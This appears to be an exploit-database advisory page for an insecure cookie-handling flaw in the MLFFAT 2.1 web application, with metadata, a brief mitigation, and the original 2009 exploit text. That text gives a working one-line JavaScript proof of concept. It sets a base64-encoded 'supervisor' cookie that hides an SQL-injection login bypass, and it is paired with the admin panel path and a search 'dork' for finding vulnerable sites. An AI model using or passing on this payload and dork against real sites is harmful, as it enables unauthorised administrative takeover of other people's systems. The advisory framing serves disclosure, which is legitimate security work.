MLFFAT 2.1 - insecure Cookie Handling

vendor:

MLFFAT

by:

Qabandi

7,5

CVSS

HIGH

Insecure Cookie Handling

613

CWE

Product Name: MLFFAT

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:mlffat:mlffat:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

MLFFAT 2.1 – insecure Cookie Handling

A vulnerability in MLFFAT 2.1 allows an attacker to gain administrative access by setting a malicious cookie. The cookie is set using a JavaScript code which sets the cookie to a value of 'OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM='. This cookie can then be used to access the administrative control panel located at './cpanel/index.php'.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

                  ||          ||   | ||        
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


######################################################
#	MLFFAT 2.1 - insecure Cookie Handling     
# 			 	     
######################################################
#	     Qabandi   | iqa[a]hotmail.fr	     
                From Kuwait, Peace.
  Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, all Muslims
######################################################
Buy:  http://mlffat.com/emm/index.php?action=order
Dork: "Powered by mlffat"
------------------------------------------------------
-:PoC:-

javascript:document.cookie = "supervisor=OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM="

AdminCP: ./cpanel/index.php


----------> La tsta3mluha 3la al mowaqi3 el islamiya <-------------

# milw0rm.com [2009-05-13]